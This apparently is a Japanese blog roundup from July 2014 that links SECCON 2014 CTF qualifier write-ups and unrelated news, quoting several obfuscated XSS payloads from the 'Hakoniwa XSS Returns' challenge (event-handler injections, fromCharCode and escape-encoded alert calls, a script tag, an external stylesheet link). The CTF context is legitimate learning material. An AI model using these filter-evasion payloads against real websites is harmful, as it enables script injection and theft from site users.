2014/07/20(日)日曜日ー。(ずずーん。。。)
[雑談] いろいろ。
- SECCON CTF オンライン予選(日本語)write-upまとめ予定地 (OD memo)
- SECCON 2014 オンライン予選「箱庭XSSリターンズ」Writeup (雑記)
textile"/onkeydown="(99995)['\u0063onstructor']['\u0063onstructor']('BBBBBBBBBBBBBBBBBBBa'[19]+'BBBBBBBBBBBBBBBBBBBl'[19]+'BBBBBBBBBBBBBBBBBBBe'[19]+'BBBBBBBBBBBBBBBBBBBr'[19]+'BBBBBBBBBBBBBBBBBBBt'[19]+'BBBBBBBBBBBBBBBBBBB('[19]+'BBBBBBBBBBBBBBBBBBB\''[19]+'BBBBBBBBBBBBBBBBBBBX'[19]+'BBBBBBBBBBBBBBBBBBBS'[19]+'BBBBBBBBBBBBBBBBBBBS'[19]+'BBBBBBBBBBBBBBBBBBB\''[19]+'BBBBBBBBBBBBBBBBBBB)'[19])()
- とある診断員のSECCONオンライン予選
- SECCON 2014 オンライン予選(日本語) Write-up (kusano_kの日記)
textile"><script>_='aconstructor'.slice(1001-1000),__='aalert'.slice(1001-1000),___='aXSS'.slice(1001-1000),{}[_][_](__+'(\''+___+'\')')()</script>"onmouseover="_='bconstructor'.substring(1003-1002),__='balert'.substring(1003-1002),___='bXSS'.substring(1003-1002),{}[_][_](__+'(\''+___+'\')')()"onmousedown="_='cconstructor'.substr(1005-1004),__='calert'.substr(1005-1004),___='cXSS'.substr(1005-1004),{}[_][_](__+'(\''+___+'\')')()"onmouseup="_='constructor',__='alert',___='XSS',{}[_][_](__+'(\''+___+'\')')()"onclick="_='constructor',__='alert',___='XSS',{}[_][_](__+'(\''+___+'\')')()"onkeydown="_='constructor',__='alert',___='XSS',{}[_][_](__+'(\''+___+'\')')()"onfocus="_='\u0063onstructor',__='\u0061lert',___='\u0058SS',{}[_][_](__+'(\''+___+'\')')()"onchange="_='\143onstructor',__='\141lert',___='\130SS',{}[_][_](__+'(\''+___+'\')')()
- 箱庭XSSリターンズ (akiym, xrekkusu, lmt_swallow)
textile"onPaste="eval(';)\'SSX\'(trela'.split('').reverse().join(''))""><link rel="stylesheet" href="http://8ant.org/asdfqwer.css"><""onfocusin="top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')""onfocusout="parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))""onfocus="window['\141\154\145\162\164']('\130\123\123')""onKeyDown="parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))""onDblClick="window['aleraaaat'.replace('aaaa','')]('XaaaaSaaaaS'.replace('aaaa','').replace('aaaa',''))""onMouseUp="window[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)]('XSS')""onMouseEnter="alert('XSS')""onMouseDown="alert('XSS')""onMouseOut="alert('XSS')""onMouseMove="alert('XSS')""onMouseLeave="alert('XSS')""onContextMenu="alert('XSS')""onCopy="alert('XSS')""onSelect="alert('XSS')""onBlur="alert('XSS')""onmouseover="(new Function('rssseturn(alesssrt)'.split('sss').join('')))()(('SXS'+'SXS').slice(-5,4))""onclick="alert('XSS')""><script src="file:///c:/wonderful.js"></script><"
- Twitter / kinugawamasato: 箱庭XSS、全クリ解法思いついた "><script>open().document.write("<textarea/id=t>opener.alert(’XSS’)</textarea><button/onclick=eval(t.value)>go")</script>
- Twitter / engine_boon: やってみたらまさにその通りだった。ショックだ。"><script>for(;;)alert("XSS")</script> を一問目に書けば最後まで行ける… #seccon
- mage ctf writeup: SECCON 2014 オンライン予選(日本語)
http://mage-ctf-writeup.blogspot.jp
- seccon2014 online ソーシャルハック? (mislead - 本気は出さないけどがんばる)
- SECCON2014 オンライン予選日本語 Write-up (妄想まとめ)
- SECCON 2014 オンライン予選 (日本語) の write-up。
- seccon2014 writeup(ネットワーク100,フォレンジック300,Unknown100)
- SECCON CTF 2014 Web 予選に参加してみた! (みむらの手記手帳)
- SECCON 2014 オンライン予選 Write-up 詰将棋(Unknown 100)
- ベネッセ流出、教育現場は板挟み 教材・模試で二人三脚 (朝日新聞デジタル)
- ネットのデータ共有で売買=容疑者「名簿業者が持ち掛け」-ベネッセ情報漏えい
- ベネッセ漏洩のデータ買った名簿業者捜索 (日本経済新聞)
- 逮捕経験者に聞いたPC遠隔操作事件! 冤罪を自白させる精神的な拷問方法が!?
- 追い出し部屋に警鐘 リコー、事実上の「敗北宣言」 (朝日新聞デジタル)
- 運営がVIP待遇をするユーザーと数日間は塩漬けにするユーザーの違い
- "基本無料" Googleがアプリ内課金で稼ぐゲームを「無料」アプリから排除へ (アプリオ)
- 理想の相手とマッチングする婚活アプリ「すれちがいマッチ」が10万組のカップル成立
- 女の業の深さを感じる「ネットカフェ女性専用エリア」の実態 (日刊SPA!)
- 声を出さずに鳴く? 猫の「サイレントニャー」とは【動画あり】 (マイナビニュース)
